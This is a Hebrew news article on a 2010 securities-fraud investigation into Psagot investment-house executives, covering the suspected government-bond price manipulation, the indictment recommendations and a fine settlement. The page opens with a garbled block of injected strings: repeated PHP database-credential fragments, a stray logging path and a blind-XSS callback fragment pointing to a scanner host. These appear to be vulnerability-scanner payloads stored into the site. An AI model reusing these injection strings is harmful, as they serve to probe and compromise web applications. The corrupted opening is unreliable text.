$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> מנהלים בחברת פסגות חשודים בתרמית בניירות ערך
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מנהלים בחברת פסגות חשודים בתרמית בניירות ערך

תאריך: 04/08/2010 12:43   מחבר: מערכת האתר

חברת פסגות הינה בית ההשקעות הגדול ביותר בישראל. בראש החברה עומד רועי ורמוס, המכהן כמנכ"ל. החברה מנהלת כספים בהיקף של 120 מיליארד ש"ח. בדצמבר 2009 רכשה קרן אייפקס מקרן יורק את השליטה בפסגות תמורת שלושה מיליארד ש"ח.

החשד והחקירה

מחלקת החקירות של הרשות לניירות ערך פתחה בחקירה גלויה בחודש פברואר 2010 כנגד שני מנהלים בכירים בחברת פסגות. דוד אדרי ושי בן דוד. החקירה נפתחה בעקבות חשד לפעולה בדרכי תרמית בחשבון הנוסטרו של פסגות תוך העלאה והורדה מניפולטיבית של שערי ניירות ערך כדי להשיא רווחים אישיים לכיסם ולחשבון הנוסטרו הידוע כעתיר נכסים.

החשד המרכזי שנבדק על ידי החוקרים הוא הרצת אגרות חוב ממשלתיות. לפי הידוע, משרד האוצר מקיים מדי פעם מכרז "החלף" שבמהלכו רוכשת הממשלה מהמשקיעים אג"ח הקרובות לפירעון ובמקביל מנפיקה להם במקומן אג"ח חדשות.

לפי החשד המיוחס לשני המנהלים הם ביצעו מניפולציות בשערי אגרות החוב, כך שמחירי האג"ח שהיו אמורים להחזיר לאוצר הוטו כלפי מעלה, ואילו האג"ח שהיו אמורים לקנות מהאוצר הוטו כלפי מטה. הודות לרמת המינוף הגבוהה בנוסטרו של פסגות, יכלו השניים להשפיע על מחיריהן של אגרות חוב הללו. בסופו של דבר, לאחר שקנו מהאוצר "בזול" ומכרו לו "ביוקר", הם גרפו רווחים המוערכים בעשרות מיליוני שקלים.

לאור האמור העבירות המיוחסות לחשודים הם: תרמית בניירות ערך, לפי סעיף 54(א)לחוק ניירות ערך. קבלת דבר במרמה לפי  סעיף 415 לחוק העונשין התשל"ז-1977. עבירות מנהלים בתאגיד לפי סעיף 425 לחוק העונשין.

מנכ"ל פסגות רועי ורמוס נחקר ויו"ר החברה אריק שטיינברג, זומנו לחקירה במשרדי מחלקת החקירות של הרשות ומסרו גרסתם. ככל הידוע שיתפו הנחקרים פעולה עם החוקרים והשיבו לשאלותיהם.

נוסטרו

נוסטרו הוא הכסף העצמי של בית ההשקעות, אותו הוא משיג  מרווחים או מהזרמות של בעלי השליטה שלו אליו. כל בית השקעות יכול לנהל לעצמו תיק נוסטרו, ולנצל את הידע שלו בשוק ההון לצורך גריפת רווחים ותשואות. ישנם בתי השקעות שמעדיפים להשקיע את כספי הנוסטרו באפיקים סולידיים כמו פיקדונות או אג"ח ממשלתיות, ואילו ישנם ברוקרים שפעילות זו מהווה מקור רווחים משמעותי עבורם.

פגיעה בציבור המשקיעים

לטענת חוקרי הרשות, הואיל והאג"ח הממשלתיות מוחזקות על-ידי הציבור הרחב, ההשפעה של פעילות זו על ציבור המשקיעים בשוק ההון משמעותית ביותר. ורמוס קיים שיחת ועידה עם יועצי ההשקעות בבנקים, ובה הבהיר כי החשדות ביחס לכספי הנוסטרו לא קשורים לכספי הלקוחות.

גם במשרד האוצר ביקשו להדגיש כי הפרשה אינה קשורה לכספי העמיתים ובהודעה לעיתונות מסר דובר האוצר: "במסגרת החקירה המתנהלת על-ידי רשות ניירות ערך בבית ההשקעות פסגות, והנמצאת בשלביה הראשוניים, לא נמצאה כל אינדיקציה לכך שישנה נגיעה לכספי החסכונות הפנסיוניים של הציבור, קרי קופות הגמל וקרנות ההשתלמות, המנוהלים על-ידי החברה".

המלצה לכתב אישום

ביום 19 בספטמבר העבירה רשות ניירות ערך לפרקליטות מסוי וכלכלה את המלצתה להעמיד לדין את החשודים הבאים: רועי ורמוס, מנכ"ל פסגות, דוד אדרי ושי בן דוד, המבצעים, סער וינטראוב ואהרון נבון, מדויטשה בנק. לציין, שלא הוגשה המלצה כלשהי בעניינו של יו"ר פסגות, אריק שטיינברג.

העבירות המיוחסות לחשודים הן: תרמית בניירות ערך, קבלת דבר במרמה והפרת אמונים בתאגיד.

תשלום קנס במקום אישום פלילי

עוד בטרם הושלמה החקירה התנהלו מגעים למכירת בית ההשקעות פסגות בין בעלת השליטה קרן יורק לבין הרוכשת הפוטנציאלית קרן אייפקס. לאחר שגובשו המלצות להגיש כתב אישום נגד החשודים ונגד החברה, תפסה אייפקס רגליים קרות והחלה להשמיע קולות של נסיגה מכוונתה לרכוש את פסגות. לשיטתה, בית השקעות שמעליו מרחפת עננה של אישום פלילי זה לא מסוג הרכישות שהקרן מעוניינת להיות מעורבת.

במסגרת דיונים מרתוניים שהתקיימו בין קרן יורק לאייפקס ובין הרשות לניירות ערך ופרקליטות המדינה , גובש הסכם לפיו, פסגות תשלם קנס מנהלי בסך 150 מליון שקל ובתמורה יופסק כנגדה כל הליך פלילי. עם זאת, לא יופסקו ההליכים כנגד המנכ"ל רועי ורמוס והחשודים המרכזיים דוד אדרי ושי בן דוד.

רועי ורמוס הרגיש כי זורקים אותו לכלבים כי לא התייעצו איתו בנוגע להסכם ואף לא ניתנה לו זכות השימוע לעניין ההסכם  שפוגע בו לשיטתו והבנתו. בעקבות כך עתר לבג"צ שיחליט בסוגיה הנדונה. נמתין להחלטת בג"צ שהוציא צו ביניים וביקש מהמדינה להסביר עמדתה.